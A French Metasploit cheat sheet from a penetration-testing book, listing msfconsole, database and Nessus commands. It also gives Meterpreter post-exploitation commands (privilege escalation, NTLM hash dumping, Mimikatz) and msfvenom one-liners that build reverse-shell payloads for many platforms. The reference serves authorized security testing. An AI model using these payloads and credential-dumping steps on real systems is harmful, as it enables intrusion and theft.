Aide-mémoire
Introduction
Afin de faciliter la réalisation des tests grâce à Metasploit, voici un aide-mémoire reprenant les commandes décrites dans ce livre.
Msfconsole
1. Les commandes de base
|
Lancer msfconsole |
: msfconsole |
|
Afficher la version de Metasploit |
: version |
|
Afficher la bannière de Metasploit |
: banner |
|
Se connecter à un port (type netcat) |
: connect |
|
Mettre à jour Metasploit sous Kali |
: apt install metasploit-framework |
|
Charger/Décharger un module |
: load / unload |
|
Définir/Supprimer une variable |
: set / unset |
|
Définir/Supprimer une variable globale |
: setg / unsetg |
|
Enregistrer les variables dans un fichier |
: save (/root/.msf4/config) |
2. Les commandes liées aux modules
|
Afficher l’ensemble des modules |
show |
|
Afficher des modules particuliers |
: show exploits/auxiliary/payloads/encoders |
|
Faire des recherches |
: search REGEXP |
|
Obtenir des infos sur un module |
: info <MODULE NAME> |
|
Obtenir les options d’un module |
: options <MODULE_NAME> |
|
Obtenir les options avancées d’un module |
: advanced <MODULE_NAME> |
|
Utiliser un module |
: use <MODULE_NAME> |
|
Afficher les options manquantes |
: show missing |
|
Éditer un module |
: edit |
|
Lancer un interpréteur Ruby |
: irb |
|
Lancer un module |
: exploit / run |
3. Les commandes liées à la base de données
|
Initialiser la base de données |
: msfdb init |
|
Afficher le statut de la base de données |
: db_status |
|
Réinitialiser la base de données |
: msfdb reinit |
|
Importer des données |
: db_import |
|
Exporter des données |
: db_export |
|
Intégrer les scans directement en base |
: db_nmap |
|
Afficher l’ensemble des services en base |
: services |
|
Afficher l’ensemble des hôtes en base |
: hosts |
|
Afficher l’ensemble des vulnérabilités |
: vulns |
4. Les commandes liées aux espaces de travail
|
Lister les espaces de travail |
: workspace |
|
Créer un espace de travail |
: workspace -a <NEW_WORKSPACE> |
|
Changer d’espace de travail |
: workspace <NEW_WORKSPACE> |
|
Supprimer un espace de travail |
: workspace -d <NEW_WORKSPACE> |
|
Supprimer tous les espaces |
: workspace -D |
5. Les commandes liées aux scanneurs de vulnérabilités
|
Nessus |
|
|
Charger le module Nessus |
: load nessus |
|
Connecter Metasploit à Nessus |
: nessus_connect |
|
Afficher l’ensemble des policies |
: nessus_policy_list |
|
Créer un nouveau scan Nessus |
: nessus_scan_new |
|
Afficher la liste des scans |
: nessus_scan_list |
|
Lancer un scan Nessus |
: nessus_scan_launch |
|
Afficher les rapports Nessus |
: nessus_report_hosts &nessus_report_vulns |
|
Télécharger... |
Meterpreter
1. Commandes de bases
|
Afficher l’aide |
: help |
|
Placer la session en tâche de fond |
: background |
|
Disposer d’un shell Ruby |
: irb |
|
Charger des modules Meterpreter |
: load <MODULE NAME> |
|
Changer de processus |
: migrate |
|
Faire appel à des fichiers ressources |
: resource |
|
Exécuter un module de post-exploitation |
: run <MODULE NAME> |
|
Obtenir le chemin courant sur la machine attaquante |
: getlwd |
|
Obtenir le chemin courant sur la machine victime |
: getwd |
|
Afficher les fichiers sur la machine attaquante |
: lls |
|
Afficher les fichiers sur la machine victime |
: ls |
|
Télécharger un fichier depuis la machine victime |
: download source destination |
|
Charger un fichier sur la machine victime |
: upload source destination |
|
Faire du forward de port |
: portfwd |
|
Transformer Meterpreter en shell standard |
: shell |
|
Exécuter une commande sur la machine victime |
: execute |
|
Obtenir un résumé des informations de la machine victime |
: sysinfo |
2. Les commandes avancées
|
Chercher des fichiers intéressants sur le disque |
: search |
|
Obtenir les droits SYSTEM (à partir d’un compte administrateur) |
: getsystem |
|
Obtenir les condensats LM/NTLM (injection en mémoire) |
: hashdump |
|
Obtenir les condensats LM/NTLM (base de registre) |
: smart_hashdump |
|
Charger le module Mimikatz |
: load mimikatz / load kiwi |
|
Charger le module Incognito |
: load incognito |
|
Migration d’un processus |
: migrate <PID> |
|
Démarrer l’enregistrement... |
MSFvenom
Linux :
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac :
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP :
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.php
ASP :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP :
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR :
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f war > shell.war
Python :
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.py
Bash :
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl :
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.pl
Mise...